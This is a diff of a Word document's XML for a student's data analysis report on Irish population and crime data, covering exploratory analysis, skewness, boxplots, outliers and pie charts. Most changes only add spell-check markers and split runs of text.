+        <w:t>rames</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>, detect relationships between variables, and examine the distribution of the variables of interest. In this study, the exploratory data analysis (EDA) step will be used to perform both statistical analysis and visualization tasks.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6043,12 +6187,14 @@
         </w:rPr>
         <w:t xml:space="preserve">, the </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
         <w:t>population_df</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="en-US"/>
@@ -6059,7 +6205,21 @@
         <w:rPr>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">  and crime_df </w:t>
+        <w:t xml:space="preserve">  and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>crime_df</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6140,7 +6300,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>This process will be performed on Jupyter notebook:</w:t>
+        <w:t xml:space="preserve">This process will be performed on </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Jupyter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> notebook:</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6160,8 +6338,9 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>MSC_DA_CA1_Jose_Mario</w:t>
-      </w:r>
+        <w:t>MSC_DA_CA1_Jose_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6170,7 +6349,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>.ipynb</w:t>
+        <w:t>Mario</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6180,7 +6359,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>.ipynb</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6195,71 +6374,30 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>and it was called</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> “</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>P</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>hase 0</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - EDA </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>”</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>and</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> it was called</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6267,6 +6405,66 @@
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> “</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>P</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>hase 0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - EDA </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
         <w:t>Skewness:</w:t>
@@ -6419,13 +6617,41 @@
         </w:rPr>
         <w:t xml:space="preserve">or </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>distplots can be used to visualize skewness. However, distplots are generally considered to be a better option because they provide more information about the shape of the data distribution.</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>distplots</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> can be used to visualize skewness. However, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>distplots</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> are generally considered to be a better option because they provide more information about the shape of the data distribution.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6513,6 +6739,7 @@
         </w:rPr>
         <w:t xml:space="preserve">Figure 01: </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6521,8 +6748,9 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">distplot </w:t>
-      </w:r>
+        <w:t>distplot</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6531,8 +6759,9 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6541,7 +6770,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">  </w:t>
+        <w:t>-</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6551,7 +6780,28 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Skewness </w:t>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Skewness</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6747,6 +6997,7 @@
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6758,6 +7009,7 @@
         </w:rPr>
         <w:t>BoxPlot</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6914,8 +7166,19 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t>dentify outliers</w:t>
-      </w:r>
+        <w:t xml:space="preserve">dentify </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>outliers</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7055,8 +7318,9 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">: Boxplot  </w:t>
-      </w:r>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7065,7 +7329,28 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>- population by region</w:t>
+        <w:t xml:space="preserve">Boxplot  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> population by region</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7153,7 +7438,15 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t>Outliers are data points that significantly differ from the majority of observations in a dataset. They can be caused by various factors, including measurement errors, data entry errors, or natural variation in the population.</w:t>
+        <w:t xml:space="preserve">Outliers are data points that significantly differ from </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>the majority of</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> observations in a dataset. They can be caused by various factors, including measurement errors, data entry errors, or natural variation in the population.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7706,7 +7999,27 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t>Pie charts use a 1D array as input, so we need to convert the data variable to a 1D array using the NumPy ravel() function.</w:t>
+        <w:t xml:space="preserve">Pie charts use a 1D array as input, so we need to convert the data variable to a 1D array using the NumPy </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>ravel(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>) function.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8065,7 +8378,27 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t>the population of Ireland is becoming more concentrated in the Dublin region. This may be due to a number of factors, such as job opportunities, educational opportunities, and cultural amenities.</w:t>
+        <w:t xml:space="preserve">the population of Ireland is becoming more concentrated in the Dublin region. This may be due to </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>a number of</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> factors, such as job opportunities, educational opportunities, and cultural amenities.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8268,7 +8601,15 @@
         <w:pStyle w:val="NormalWeb"/>
       </w:pPr>
       <w:r>
-        <w:t>We can use a set of tools and techniques for collecting, organizing, summarizing, analyzing, and interpreting data.</w:t>
+        <w:t xml:space="preserve">We can use a set of tools and techniques for collecting, organizing, summarizing, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>analyzing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, and interpreting data.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -8307,8 +8648,9 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve">Statistical techniques were employed in this project within the Jupyter notebook named </w:t>
-      </w:r>
+        <w:t xml:space="preserve">Statistical techniques were employed in this project within the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -8323,8 +8665,9 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>“</w:t>
-      </w:r>
+        <w:t>Jupyter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -8339,7 +8682,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>MSC_DA_CA1_Jose_Mario.ipynb</w:t>
+        <w:t xml:space="preserve"> notebook named </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8355,7 +8698,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>”,</w:t>
+        <w:t>“</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8371,7 +8714,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve"> encompassing both </w:t>
+        <w:t>MSC_DA_CA1_Jose_Mario.ipynb</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8387,7 +8730,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>“</w:t>
+        <w:t>”,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8403,7 +8746,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>Phase 3, which focused on statistics, and Phase 4, which centered on machine learning</w:t>
+        <w:t xml:space="preserve"> encompassing both </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8419,7 +8762,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>”</w:t>
+        <w:t>“</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8435,8 +8778,9 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Phase 3, which focused on statistics, and Phase 4, which </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -8451,14 +8795,10 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
+        <w:t>centered</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -8472,7 +8812,8 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve"> on machine learning</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -8487,7 +8828,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>By u</w:t>
+        <w:t>”</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8503,7 +8844,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>sing the method describe, we can get important information from the result</w:t>
+        <w:t>.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8519,6 +8860,74 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>By u</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>sing the method describe, we can get important information from the result</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
         <w:t>.</w:t>
       </w:r>
     </w:p>
@@ -8661,11 +9070,47 @@
           <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
         </w:rPr>
-        <w:t>Applyiing the .describe() method on crime_df:</w:t>
+        <w:t>Applyiing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t>the .describe</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t xml:space="preserve">() method on </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t>crime_df</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+        <w:t>:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8748,6 +9193,7 @@
                               </w:rPr>
                               <w:t xml:space="preserve">From this </w:t>
                             </w:r>
+                            <w:proofErr w:type="gramStart"/>
                             <w:r>
                               <w:rPr>
